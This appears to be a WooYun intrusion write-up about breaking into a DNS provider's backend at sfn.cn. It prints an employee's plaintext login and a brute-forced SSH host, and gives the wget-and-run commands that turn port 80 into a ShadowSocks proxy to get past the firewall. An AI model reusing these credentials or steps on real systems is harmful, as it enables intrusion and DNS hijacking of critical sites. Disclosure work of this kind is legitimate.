WooYun.org

在OA已经摸清楚了组织架构。
也拿到了一些人的常用密码（在OA和邮箱都能登陆的肯定是常用密码）
此时找到后台 http://admin.sfn.cn
用 liruijing kuaikuailele123 登陆
居然发现登陆后，burp抓包，登陆成功，进入管理页面，又瞬间loction跳出
这是个什么节奏？难道是IP限制？
试过XFW修改IP等一系列办法，包括通过邮箱重置密码为

*****kr*****

依旧不能登录
最终在邮箱找到这个才明白。

哦，信任域以外就不要想了。看来是判断真实IP了，非办公IP不能登录后台。
那这下怎么办呢，找找办公IP呗，顺带撸了很多密码

也撸了很多系统登录地址。

每个员工一个公网IP的公司是多么的土豪。

此时有了思路，扫描员工的电脑，说不定又那啥ms08067（我又想多了）
扫到类似 210.72.13.160 开了 3389的XP电脑 可惜啊 没猜出也没射出密码。
静下来想了下，既然能给110那么高的规则，其他的也肯定是有限制，那能从哪里撸进去呢。
想了想，那么多的口令不用可不浪费了吗？
扫描出开了 22和22022端口的机器，暴力扫出 210.72.13.48 的ssh弱口令

有了root 我们看看在不在信任域

nmap扫110扫出很多个端口。看来必定在信任域
传个proxy脚本上去访问下端口看看情况先

既然在信任域，那能玩的姿势就太多了，转发，VPN，代理。
这里用zone 猪猪侠等的内网边界神器，统统不好使。

后来发现是防火墙作祟，那该怎么办？
静思三秒，决定走ShadowSocks
防火墙只放行80，那我们就先暂停他的80服务，然后开代理进去看看。
说做就做，ShadowSocks代理姿势如下：
wget --no-check-certificate http://7sbp7c.com1.z0.glb.clouddn.com/shadowsocks-go.sh
chmod +x shadowsocks-go.sh
./shadowsocks-go.sh 2>&1 | tee shadowsocks-go.log
依次安装好，输入密码。

默认完成是这样的
但是默认是443端口，这个IP下防火墙都不放行，没办法，停掉apache，停掉代理，改配置
service httpd stop
/etc/init.d/shadowsocks stop
查看配置 vi改

这是修改后的配置

用白名单的80端口
然后启动服务
/etc/init.d/shadowsocks start
配置好代理

注意密码加密格式，现在本机1080已经有S5代理，不过全局就行啦，直接IE打开
查看下IP 已经是了

进入后台 果断的放行了这次
12306的

你们的接口居然直接查询用户的明文密码！！！！

后台可以改解析，主站也可以改

中国人民银行也在这里哟

太多gov域名了，表哥拒绝查水表！！！